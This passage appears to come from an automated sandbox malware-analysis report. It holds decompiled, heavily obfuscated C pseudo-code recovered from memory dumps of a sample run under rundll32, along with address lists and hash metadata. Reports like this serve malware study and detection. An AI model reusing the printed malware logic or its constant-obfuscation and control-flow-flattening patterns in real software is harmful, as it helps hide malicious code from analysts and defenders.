                                                                                                                                                            					}
                                                                                                                                                            					goto L27;
                                                                                                                                                            					L24:
                                                                                                                                                            					__eflags = _t382 - 0xd4a25d5;
                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                            				goto L27;
                                                                                                                                                            			}























































                                                                                                                                                            0x003723de
                                                                                                                                                            0x003723e6
                                                                                                                                                            0x003723ee
                                                                                                                                                            0x003723f3
                                                                                                                                                            0x003723fd
                                                                                                                                                            0x00372411
                                                                                                                                                            0x00372416
                                                                                                                                                            0x0037241f
                                                                                                                                                            0x0037242a
                                                                                                                                                            0x00372432
                                                                                                                                                            0x0037243f
                                                                                                                                                            0x00372442
                                                                                                                                                            0x00372446
                                                                                                                                                            0x0037244e
                                                                                                                                                            0x00372456
                                                                                                                                                            0x0037245e
                                                                                                                                                            0x0037246e
                                                                                                                                                            0x00372472
                                                                                                                                                            0x0037247a
                                                                                                                                                            0x00372485
                                                                                                                                                            0x00372490
                                                                                                                                                            0x0037249b
                                                                                                                                                            0x003724a3
                                                                                                                                                            0x003724ab
                                                                                                                                                            0x003724b3
                                                                                                                                                            0x003724c5
                                                                                                                                                            0x003724ca
                                                                                                                                                            0x003724d3
                                                                                                                                                            0x003724de
                                                                                                                                                            0x003724e6
                                                                                                                                                            0x003724eb
                                                                                                                                                            0x003724f3
                                                                                                                                                            0x00372500
                                                                                                                                                            0x00372501
                                                                                                                                                            0x00372505
                                                                                                                                                            0x0037250d
                                                                                                                                                            0x00372515
                                                                                                                                                            0x0037251d
                                                                                                                                                            0x00372525
                                                                                                                                                            0x0037252d
                                                                                                                                                            0x00372532
                                                                                                                                                            0x00372537
                                                                                                                                                            0x0037253f
                                                                                                                                                            0x0037254c
                                                                                                                                                            0x00372550
                                                                                                                                                            0x00372558
                                                                                                                                                            0x00372560
                                                                                                                                                            0x00372566
                                                                                                                                                            0x0037256a
                                                                                                                                                            0x0037256f
                                                                                                                                                            0x00372573
                                                                                                                                                            0x00372578
                                                                                                                                                            0x00372580
                                                                                                                                                            0x0037258b
                                                                                                                                                            0x00372596
                                                                                                                                                            0x003725a1
                                                                                                                                                            0x003725a9
                                                                                                                                                            0x003725b1
                                                                                                                                                            0x003725b9
                                                                                                                                                            0x003725c1
                                                                                                                                                            0x003725c6
                                                                                                                                                            0x003725cb
                                                                                                                                                            0x003725d3
                                                                                                                                                            0x003725e6
                                                                                                                                                            0x003725ed
                                                                                                                                                            0x003725f8
                                                                                                                                                            0x00372600
                                                                                                                                                            0x00372608
                                                                                                                                                            0x0037260d
                                                                                                                                                            0x00372612
                                                                                                                                                            0x0037261c
                                                                                                                                                            0x00372635
                                                                                                                                                            0x0037263a
                                                                                                                                                            0x00372643
                                                                                                                                                            0x0037264e
                                                                                                                                                            0x00372656
                                                                                                                                                            0x0037265b
                                                                                                                                                            0x00372660
                                                                                                                                                            0x00372668
                                                                                                                                                            0x00372674
                                                                                                                                                            0x0037267c
                                                                                                                                                            0x00372680
                                                                                                                                                            0x00372685
                                                                                                                                                            0x0037268d
                                                                                                                                                            0x00372695
                                                                                                                                                            0x0037269d
                                                                                                                                                            0x003726aa
                                                                                                                                                            0x003726ae
                                                                                                                                                            0x003726b6
                                                                                                                                                            0x003726be
                                                                                                                                                            0x003726c6
                                                                                                                                                            0x003726d3
                                                                                                                                                            0x003726d7
                                                                                                                                                            0x003726dc
                                                                                                                                                            0x003726e4
                                                                                                                                                            0x003726ef
                                                                                                                                                            0x003726fa
                                                                                                                                                            0x003726fa
                                                                                                                                                            0x00372705
                                                                                                                                                            0x00372705
                                                                                                                                                            0x00372705
                                                                                                                                                            0x00372705
                                                                                                                                                            0x00372707
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037270d
                                                                                                                                                            0x0037282a
                                                                                                                                                            0x0037282f
                                                                                                                                                            0x00372832
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00372713
                                                                                                                                                            0x00372719
                                                                                                                                                            0x00372808
                                                                                                                                                            0x0037280a
                                                                                                                                                            0x0037280d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037271f
                                                                                                                                                            0x00372725
                                                                                                                                                            0x003727f2
                                                                                                                                                            0x003727f7
                                                                                                                                                            0x003727fa
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037272b
                                                                                                                                                            0x00372731
                                                                                                                                                            0x003727c0
                                                                                                                                                            0x003727c5
                                                                                                                                                            0x003727c8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00372733
                                                                                                                                                            0x00372739
                                                                                                                                                            0x0037278b
                                                                                                                                                            0x00372790
                                                                                                                                                            0x00372793
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037273b
                                                                                                                                                            0x00372741
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00372747
                                                                                                                                                            0x00372756
                                                                                                                                                            0x00372757
                                                                                                                                                            0x00372758
                                                                                                                                                            0x0037275d
                                                                                                                                                            0x00372763
                                                                                                                                                            0x00372769
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00372769
                                                                                                                                                            0x00372763
                                                                                                                                                            0x00372741
                                                                                                                                                            0x00372739
                                                                                                                                                            0x00372731
                                                                                                                                                            0x00372725
                                                                                                                                                            0x00372719
                                                                                                                                                            0x0037293e
                                                                                                                                                            0x00372940
                                                                                                                                                            0x00372945
                                                                                                                                                            0x00372945
                                                                                                                                                            0x0037294f
                                                                                                                                                            0x0037294f
                                                                                                                                                            0x0037283c
                                                                                                                                                            0x00372842
                                                                                                                                                            0x003728fd
                                                                                                                                                            0x00372902
                                                                                                                                                            0x00372905
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00372848
                                                                                                                                                            0x00372848
                                                                                                                                                            0x0037284e
                                                                                                                                                            0x00372936

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: !B {$#8$)e$3{$N<@$R2G$d[$e.($nx~$nx~$e
                                                                                                                                                            • API String ID: 0-245365489
                                                                                                                                                            • Opcode ID: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                                                            • Instruction ID: 011ae69891b6eb8290987484a95b5742a4581c9a99a31eadcf9f34344e768cdc
                                                                                                                                                            • Opcode Fuzzy Hash: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                                                            • Instruction Fuzzy Hash: 5AF131715083809FD369CF61C58AA5BFBE1FBD4348F10891DF29A8A261D7B58958CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E00379714(void* __ecx, void* __edx) {
                                                                                                                                                            				signed int _v4;
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				signed int _v96;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				signed int _v104;
                                                                                                                                                            				void* _t251;
                                                                                                                                                            				intOrPtr _t252;
                                                                                                                                                            				intOrPtr _t253;
                                                                                                                                                            				void* _t257;
                                                                                                                                                            				signed int _t259;
                                                                                                                                                            				signed int _t260;
                                                                                                                                                            				signed int _t261;
                                                                                                                                                            				signed int _t262;
                                                                                                                                                            				signed int _t263;
                                                                                                                                                            				signed int _t264;
                                                                                                                                                            				void* _t292;
                                                                                                                                                            				void* _t293;
                                                                                                                                                            				signed int* _t296;
                                                                                                                                                            				signed int* _t297;
                                                                                                                                                            
                                                                                                                                                            				_t296 =  &_v104;
                                                                                                                                                            				_v4 = _v4 & 0x00000000;
                                                                                                                                                            				_v12 = 0xc5b764;
                                                                                                                                                            				_v8 = 0xb6da07;
                                                                                                                                                            				_v100 = 0x6b81aa;
                                                                                                                                                            				_v100 = _v100 ^ 0x5133456b;
                                                                                                                                                            				_t8 =  &_v100; // 0x5133456b
                                                                                                                                                            				_v100 =  *_t8 * 0x6e;
                                                                                                                                                            				_t292 = __edx;
                                                                                                                                                            				_v100 = _v100 << 0xa;
                                                                                                                                                            				_v100 = _v100 ^ 0x922ec96f;
                                                                                                                                                            				_t257 = __ecx;
                                                                                                                                                            				_v20 = 0x2c208b;
                                                                                                                                                            				_t293 = 0x52ffaa2;
                                                                                                                                                            				_v20 = _v20 + 0xffff37e6;
                                                                                                                                                            				_v20 = _v20 ^ 0x00212911;
                                                                                                                                                            				_v60 = 0xb21c01;
                                                                                                                                                            				_v60 = _v60 ^ 0x31980a41;
                                                                                                                                                            				_v60 = _v60 + 0xffff033c;
                                                                                                                                                            				_v60 = _v60 ^ 0x31255444;
                                                                                                                                                            				_v64 = 0x612501;
                                                                                                                                                            				_v64 = _v64 << 2;
                                                                                                                                                            				_v64 = _v64 + 0xf44;
                                                                                                                                                            				_v64 = _v64 ^ 0x018d6347;
                                                                                                                                                            				_v52 = 0x111460;
                                                                                                                                                            				_v52 = _v52 + 0xffffc2ff;
                                                                                                                                                            				_v52 = _v52 | 0x8d441097;
                                                                                                                                                            				_v52 = _v52 ^ 0x8d5fe5cb;
                                                                                                                                                            				_v56 = 0xb6e38a;
                                                                                                                                                            				_t259 = 0x67;
                                                                                                                                                            				_v56 = _v56 / _t259;
                                                                                                                                                            				_t260 = 0x41;
                                                                                                                                                            				_v56 = _v56 * 0x32;
                                                                                                                                                            				_v56 = _v56 ^ 0x00536033;
                                                                                                                                                            				_v96 = 0xaa1e09;
                                                                                                                                                            				_v96 = _v96 / _t260;
                                                                                                                                                            				_t261 = 0x73;
                                                                                                                                                            				_v96 = _v96 * 0xd;
                                                                                                                                                            				_v96 = _v96 / _t261;
                                                                                                                                                            				_v96 = _v96 ^ 0x00047537;
                                                                                                                                                            				_v88 = 0xebbfc;
                                                                                                                                                            				_v88 = _v88 << 7;
                                                                                                                                                            				_v88 = _v88 | 0x3053ba58;
                                                                                                                                                            				_t262 = 0x7f;
                                                                                                                                                            				_v88 = _v88 / _t262;
                                                                                                                                                            				_v88 = _v88 ^ 0x006c206b;
                                                                                                                                                            				_v44 = 0xece271;
                                                                                                                                                            				_v44 = _v44 + 0xffff86ef;
                                                                                                                                                            				_v44 = _v44 + 0x6a70;
                                                                                                                                                            				_v44 = _v44 ^ 0x00eb9b45;
                                                                                                                                                            				_v48 = 0xd70038;
                                                                                                                                                            				_v48 = _v48 | 0x378b661e;
                                                                                                                                                            				_v48 = _v48 ^ 0xfc23f8e2;
                                                                                                                                                            				_v48 = _v48 ^ 0xcbf8b4c1;
                                                                                                                                                            				_v92 = 0x86f3ef;
                                                                                                                                                            				_v92 = _v92 << 0xd;
                                                                                                                                                            				_v92 = _v92 >> 0xd;
                                                                                                                                                            				_v92 = _v92 + 0x4513;
                                                                                                                                                            				_v92 = _v92 ^ 0x000ef1b6;
                                                                                                                                                            				_v80 = 0x7a204;
                                                                                                                                                            				_v80 = _v80 + 0xffffa60a;
                                                                                                                                                            				_v80 = _v80 | 0x4d150135;
                                                                                                                                                            				_v80 = _v80 + 0xffff9d32;
                                                                                                                                                            				_v80 = _v80 ^ 0x4d179d3b;
                                                                                                                                                            				_v40 = 0x124198;
                                                                                                                                                            				_v40 = _v40 ^ 0x5335feb3;
                                                                                                                                                            				_t263 = 0x78;
                                                                                                                                                            				_v40 = _v40 * 0x18;
                                                                                                                                                            				_v40 = _v40 ^ 0xcbb00a78;
                                                                                                                                                            				_v84 = 0xcaa24a;
                                                                                                                                                            				_v84 = _v84 * 0x42;
                                                                                                                                                            				_v84 = _v84 ^ 0x45be5790;
                                                                                                                                                            				_v84 = _v84 + 0xffff0d2f;
                                                                                                                                                            				_v84 = _v84 ^ 0x718e360f;
                                                                                                                                                            				_v24 = 0x4d7038;
                                                                                                                                                            				_v24 = _v24 | 0x28b75b7a;
                                                                                                                                                            				_v24 = _v24 ^ 0x28f4655f;
                                                                                                                                                            				_v28 = 0x844762;
                                                                                                                                                            				_v28 = _v28 ^ 0xe0e1df8a;
                                                                                                                                                            				_v28 = _v28 ^ 0xe064bc9e;
                                                                                                                                                            				_v32 = 0xfc2930;
                                                                                                                                                            				_v32 = _v32 / _t263;
                                                                                                                                                            				_v32 = _v32 ^ 0x00028374;
                                                                                                                                                            				_v104 = 0xce3f74;
                                                                                                                                                            				_v104 = _v104 + 0x3224;
                                                                                                                                                            				_v104 = _v104 + 0x85ca;
                                                                                                                                                            				_t264 = 0xe;
                                                                                                                                                            				_v104 = _v104 / _t264;
                                                                                                                                                            				_v104 = _v104 ^ 0x0007887d;
                                                                                                                                                            				_v68 = 0x11fdc1;
                                                                                                                                                            				_v68 = _v68 | 0x0fd109af;
                                                                                                                                                            				_t265 = 0x52;
                                                                                                                                                            				_v68 = _v68 / _t265;
                                                                                                                                                            				_v68 = _v68 ^ 0x00367c27;
                                                                                                                                                            				_v72 = 0xa9a7e;
                                                                                                                                                            				_v72 = _v72 * 0x16;
                                                                                                                                                            				_v72 = _v72 ^ 0xca0bce5f;
                                                                                                                                                            				_v72 = _v72 ^ 0xcae4b7d2;
                                                                                                                                                            				_v76 = 0xb2d6c0;
                                                                                                                                                            				_v76 = _v76 + 0xffff5dcd;
                                                                                                                                                            				_v76 = _v76 >> 0xe;
                                                                                                                                                            				_v76 = _v76 >> 4;
                                                                                                                                                            				_v76 = _v76 ^ 0x0002e66e;
                                                                                                                                                            				_v16 = 0x41627;
                                                                                                                                                            				_v16 = _v16 + 0xccf7;
                                                                                                                                                            				_v16 = _v16 ^ 0x00091dff;
                                                                                                                                                            				_v36 = 0xd94625;
                                                                                                                                                            				_v36 = _v36 + 0x741;
                                                                                                                                                            				_v36 = _v36 << 0x10;
                                                                                                                                                            				_v36 = _v36 ^ 0x4d68793e;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					L1:
                                                                                                                                                            					_t251 = 0xc3f018b;
                                                                                                                                                            					do {
                                                                                                                                                            						L2:
                                                                                                                                                            						while(_t293 != 0x52ffaa2) {
                                                                                                                                                            							if(_t293 == 0x865547f) {
                                                                                                                                                            								_t265 = _v80;
                                                                                                                                                            								_t252 = E0037CDAE(_v80, _v40, _v84,  *((intOrPtr*)(_t292 + 0x38)));
                                                                                                                                                            								_t296 =  &(_t296[2]);
                                                                                                                                                            								 *((intOrPtr*)(_t292 + 0x1c)) = _t252;
                                                                                                                                                            								__eflags = _t252;
                                                                                                                                                            								_t251 = 0xc3f018b;
                                                                                                                                                            								_t293 =  !=  ? 0xc3f018b : 0xb7a2405;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            							if(_t293 == 0xb133873) {
                                                                                                                                                            								_push(_v64);
                                                                                                                                                            								_t253 = E0038C3A0(_t257, _v100, __eflags, _v20, _v60, _t265);
                                                                                                                                                            								_t297 =  &(_t296[4]);
                                                                                                                                                            								 *((intOrPtr*)(_t292 + 0x38)) = _t253;
                                                                                                                                                            								__eflags = _t253;
                                                                                                                                                            								if(_t253 != 0) {
                                                                                                                                                            									E00377B8B( *((intOrPtr*)(_t292 + 0x38)), _v52,  *((intOrPtr*)(_t292 + 0x38)), _v56, _v96);
                                                                                                                                                            									_push( *((intOrPtr*)(_t292 + 0x38)));
                                                                                                                                                            									_push(_v92);
                                                                                                                                                            									_push(_v48);
                                                                                                                                                            									_t265 = _v88;
                                                                                                                                                            									E00377C37(_v88, _v44);
                                                                                                                                                            									_t296 =  &(_t297[6]);
                                                                                                                                                            									_t293 = 0x865547f;
                                                                                                                                                            									goto L1;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t293 == 0xb7a2405) {
                                                                                                                                                            									return E00389E56(_v76, _v16, _v36,  *((intOrPtr*)(_t292 + 0x38)));
                                                                                                                                                            								}
                                                                                                                                                            								if(_t293 != _t251) {
                                                                                                                                                            									goto L13;
                                                                                                                                                            								} else {
                                                                                                                                                            									_t253 = E003746BE(_t265, _v24, _t265, _v28, _t265, _v32, _v104, _v68, _t265, _t292, E0037219A, _v72);
                                                                                                                                                            									_t296 =  &(_t296[0xa]);
                                                                                                                                                            									 *((intOrPtr*)(_t292 + 0x2c)) = _t253;
                                                                                                                                                            									if(_t253 == 0) {
                                                                                                                                                            										_t293 = 0xb7a2405;
                                                                                                                                                            										while(1) {
                                                                                                                                                            											L1:
                                                                                                                                                            											_t251 = 0xc3f018b;
                                                                                                                                                            											goto L2;
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							return _t253;
                                                                                                                                                            						}
                                                                                                                                                            						_t293 = 0xb133873;
                                                                                                                                                            						L13:
                                                                                                                                                            						__eflags = _t293 - 0x1aeb2e;
                                                                                                                                                            					} while (__eflags != 0);
                                                                                                                                                            					return _t251;
                                                                                                                                                            				}
                                                                                                                                                            			}











































                                                                                                                                                            0x00379b3b
                                                                                                                                                            0x00379b3e
                                                                                                                                                            0x00379b41
                                                                                                                                                            0x00379b45
                                                                                                                                                            0x00379b4a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00379b4a
                                                                                                                                                            0x00379a78
                                                                                                                                                            0x00379ac5
                                                                                                                                                            0x00379ad8
                                                                                                                                                            0x00379add
                                                                                                                                                            0x00379ae0
                                                                                                                                                            0x00379ae3
                                                                                                                                                            0x00379ae5
                                                                                                                                                            0x00379afd
                                                                                                                                                            0x00379b02
                                                                                                                                                            0x00379b05
                                                                                                                                                            0x00379b09
                                                                                                                                                            0x00379b11
                                                                                                                                                            0x00379b15
                                                                                                                                                            0x00379b1a
                                                                                                                                                            0x00379b1d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00379b1d
                                                                                                                                                            0x00379a7a
                                                                                                                                                            0x00379a7c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00379b7a
                                                                                                                                                            0x00379a84
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00379a8a
                                                                                                                                                            0x00379aae
                                                                                                                                                            0x00379ab3
                                                                                                                                                            0x00379ab6
                                                                                                                                                            0x00379abb
                                                                                                                                                            0x00379ac1
                                                                                                                                                            0x00379a55
                                                                                                                                                            0x00379a55
                                                                                                                                                            0x00379a55
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00379a55
                                                                                                                                                            0x00379a55
                                                                                                                                                            0x00379abb
                                                                                                                                                            0x00379a84
                                                                                                                                                            0x00379b82
                                                                                                                                                            0x00379b82
                                                                                                                                                            0x00379b52
                                                                                                                                                            0x00379b57
                                                                                                                                                            0x00379b57
                                                                                                                                                            0x00379b57
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00379a5a

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: $2$'|6$3`S$8$8pM$>yhM$DT%1$k l$kE3Q$pj$q
                                                                                                                                                            • API String ID: 0-1622084174
                                                                                                                                                            • Opcode ID: 8eaf5c6f0a753a4ec66574d05432d87a00b0973e70b1ee48b1d531814ef1604d
                                                                                                                                                            • Instruction ID: c9ed7f3a82b4a6d8a2563c9b1eb65a63a8158b4bbfced1bbe62adc437f247720
                                                                                                                                                            • Opcode Fuzzy Hash: 8eaf5c6f0a753a4ec66574d05432d87a00b0973e70b1ee48b1d531814ef1604d
                                                                                                                                                            • Instruction Fuzzy Hash: E7B140729083419FC3A8CF25C58A90BFBF1BBC4758F008A1DF59A96220D3B5D959CF82
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E003764E2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                            				char _v260;
                                                                                                                                                            				signed int _v264;
                                                                                                                                                            				intOrPtr _v268;
                                                                                                                                                            				char _v276;
                                                                                                                                                            				signed int _v280;
                                                                                                                                                            				signed int _v284;
                                                                                                                                                            				signed int _v288;
                                                                                                                                                            				signed int _v292;
                                                                                                                                                            				signed int _v296;
                                                                                                                                                            				signed int _v300;
                                                                                                                                                            				signed int _v304;
                                                                                                                                                            				signed int _v308;
                                                                                                                                                            				signed int _v312;
                                                                                                                                                            				signed int _v316;
                                                                                                                                                            				signed int _v320;
                                                                                                                                                            				signed int _v324;
                                                                                                                                                            				signed int _v328;
                                                                                                                                                            				signed int _v332;
                                                                                                                                                            				signed int _v336;
                                                                                                                                                            				signed int _v340;
                                                                                                                                                            				signed int _v344;
                                                                                                                                                            				signed int _v348;
                                                                                                                                                            				signed int _v352;
                                                                                                                                                            				signed int _v356;
                                                                                                                                                            				signed int _v360;
                                                                                                                                                            				signed int _v364;
                                                                                                                                                            				signed int _v368;
                                                                                                                                                            				signed int _v372;
                                                                                                                                                            				signed int _v376;
                                                                                                                                                            				signed int _v380;
                                                                                                                                                            				signed int _v384;
                                                                                                                                                            				signed int _v388;
                                                                                                                                                            				signed int _v392;
                                                                                                                                                            				signed int _v396;
                                                                                                                                                            				signed int _v400;
                                                                                                                                                            				signed int _v404;
                                                                                                                                                            				signed int _v408;
                                                                                                                                                            				signed int _v412;
                                                                                                                                                            				void* _t311;
                                                                                                                                                            				void* _t332;
                                                                                                                                                            				intOrPtr _t335;
                                                                                                                                                            				intOrPtr _t338;
                                                                                                                                                            				intOrPtr _t343;
                                                                                                                                                            				void* _t345;
                                                                                                                                                            				void* _t347;
                                                                                                                                                            				void* _t349;
                                                                                                                                                            				void* _t352;
                                                                                                                                                            				intOrPtr _t359;
                                                                                                                                                            				intOrPtr _t361;
                                                                                                                                                            				intOrPtr* _t362;
                                                                                                                                                            				intOrPtr _t364;
                                                                                                                                                            				signed int _t367;
                                                                                                                                                            				intOrPtr _t386;
                                                                                                                                                            				intOrPtr _t387;
                                                                                                                                                            				intOrPtr _t413;
                                                                                                                                                            				signed int _t414;
                                                                                                                                                            				signed int _t415;
                                                                                                                                                            				signed int _t416;
                                                                                                                                                            				signed int _t417;
                                                                                                                                                            				signed int _t418;
                                                                                                                                                            				signed int _t419;
                                                                                                                                                            				signed int _t420;
                                                                                                                                                            				signed int _t421;
                                                                                                                                                            				signed int _t422;
                                                                                                                                                            				void* _t423;
                                                                                                                                                            				signed int* _t425;
                                                                                                                                                            				void* _t427;
                                                                                                                                                            
                                                                                                                                                            				_push(_a24);
                                                                                                                                                            				_t423 = __edx;
                                                                                                                                                            				_push(_a20);
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t311);
                                                                                                                                                            				_v264 = _v264 & 0x00000000;
                                                                                                                                                            				_t425 =  &(( &_v412)[8]);
                                                                                                                                                            				_v268 = 0x38f10b;
                                                                                                                                                            				_v376 = 0x1d6e4;
                                                                                                                                                            				_t364 = 0;
                                                                                                                                                            				_v376 = _v376 + 0x2cf5;
                                                                                                                                                            				_t367 = 0x349a1a2;
                                                                                                                                                            				_v376 = _v376 + 0xffffbc4f;
				_v376 = _v376 + 0xc828;
				_v376 = _v376 ^ 0x000c4abe;
				_v344 = 0xf0b614;
				_t415 = 0x49;
				_v344 = _v344 / _t415;
				_v344 = _v344 ^ 0x0006b22b;
				_v296 = 0xc48c2;
				_v296 = _v296 >> 0xa;
				_v296 = _v296 ^ 0x0001ad51;
				_v384 = 0x7feda9;
				_t416 = 0x39;
				_v384 = _v384 * 0x1a;
				_v384 = _v384 ^ 0x3da8c069;
				_v384 = _v384 + 0xffff691b;
				_v384 = _v384 ^ 0x315a0b75;
				_v400 = 0x77d138;
				_v400 = _v400 + 0xffff5a87;
				_v400 = _v400 << 3;
				_v400 = _v400 + 0xffff9ef2;
				_v400 = _v400 ^ 0x03bdd381;
				_v312 = 0x267902;
				_v312 = _v312 | 0xf93e454e;
				_v312 = _v312 ^ 0xf93fe769;
				_v308 = 0x6d5338;
				_v308 = _v308 ^ 0x3f4c4be5;
				_v308 = _v308 ^ 0x3f211e75;
				_v328 = 0x5e1da9;
				_v328 = _v328 / _t416;
				_v328 = _v328 ^ 0x000cc368;
				_v364 = 0xd2dbf2;
				_v364 = _v364 + 0xffffefaa;
				_v364 = _v364 + 0xd543;
				_v364 = _v364 ^ 0x00d6d9fb;
				_v304 = 0x235f1e;
				_t417 = 0x2e;
				_v304 = _v304 / _t417;
				_v304 = _v304 ^ 0x000b3ded;
				_v320 = 0xc8231f;
				_v320 = _v320 << 0xc;
				_v320 = _v320 ^ 0x8237c00a;
				_v356 = 0xee2c9b;
				_v356 = _v356 ^ 0xa0da06c4;
				_v356 = _v356 ^ 0xf246f640;
				_v356 = _v356 ^ 0x52703357;
				_v412 = 0xc100a3;
				_v412 = _v412 ^ 0xb8e7c080;
				_v412 = _v412 ^ 0xb6721a67;
				_v412 = _v412 ^ 0xff44de7f;
				_v412 = _v412 ^ 0xf11e2702;
				_v396 = 0xa6af25;
				_v396 = _v396 << 0x10;
				_v396 = _v396 >> 7;
				_v396 = _v396 + 0xffff7054;
				_v396 = _v396 ^ 0x015ec427;
				_v404 = 0x1f48c8;
				_t418 = 0x2d;
				_v404 = _v404 / _t418;
				_v404 = _v404 << 0xb;
				_v404 = _v404 | 0x7455ca98;
				_v404 = _v404 ^ 0x75da0b0a;
				_v368 = 0x174318;
				_v368 = _v368 + 0x805d;
				_v368 = _v368 ^ 0x0012ca04;
				_v408 = 0x579c92;
				_t419 = 0x65;
				_v408 = _v408 * 0x61;
				_v408 = _v408 ^ 0x6a2d4e62;
				_v408 = _v408 + 0xd9d0;
				_v408 = _v408 ^ 0x4b1c9053;
				_v392 = 0x2598b2;
				_v392 = _v392 * 0xd;
				_v392 = _v392 ^ 0xb79fc0d8;
				_v392 = _v392 + 0xffff9085;
				_v392 = _v392 ^ 0xb671271d;
				_v324 = 0x8734;
				_v324 = _v324 + 0xffff82f4;
				_v324 = _v324 ^ 0x000c0e93;
				_v332 = 0x81f499;
				_v332 = _v332 ^ 0xcb023f28;
				_v332 = _v332 ^ 0xcb8aeffa;
				_v340 = 0xbb3951;
				_v340 = _v340 ^ 0x050a1ed9;
				_v340 = _v340 ^ 0x05b74055;
				_v372 = 0x5c4d3f;
				_v372 = _v372 + 0xffffba18;
				_v372 = _v372 | 0xc0b40c25;
				_v372 = _v372 >> 3;
				_v372 = _v372 ^ 0x1815f0ae;
				_v380 = 0xe44e59;
				_v380 = _v380 + 0x7d25;
				_v380 = _v380 + 0xffff00c0;
				_v380 = _v380 << 0xa;
				_v380 = _v380 ^ 0x8f30862d;
				_v360 = 0x1cbdf;
				_v360 = _v360 + 0xffff6e4b;
				_v360 = _v360 >> 8;
				_v360 = _v360 ^ 0x0001cec6;
				_v348 = 0xf4499d;
				_v348 = _v348 + 0x832d;
				_v348 = _v348 << 2;
				_v348 = _v348 ^ 0x03dc7480;
				_v352 = 0x4c1d4a;
				_v352 = _v352 >> 0xd;
				_v352 = _v352 * 0xe;
				_v352 = _v352 ^ 0x0003e302;
				_v388 = 0x7e89b7;
				_v388 = _v388 / _t419;
				_t420 = 0x48;
				_v388 = _v388 / _t420;
				_t421 = 0x2b;
				_t414 = _v368;
				_v388 = _v388 / _t421;
				_v388 = _v388 ^ 0x000ed69e;
				_t422 = _v368;
				_v300 = 0xe9da01;
				_v300 = _v300 + 0xffffd878;
				_v300 = _v300 ^ 0x00eb5be0;
				_v336 = 0x6aaf6d;
				_v336 = _v336 * 0x22;
				_v336 = _v336 ^ 0x0e2b42a4;
				_v316 = 0x54d710;
				_v316 = _v316 >> 0xc;
				_v316 = _v316 ^ 0x0000014d;
				while(1) {
					L1:
					_t332 = 0x61250f6;
					do {
						while(1) {
							L2:
							_t427 = _t367 - _t332;
							if(_t427 > 0) {
								break;
							}
							if(_t427 == 0) {
								_t352 = E00380AE0(0x40, 1);
								_push(_v320);
								_push( &_v260);
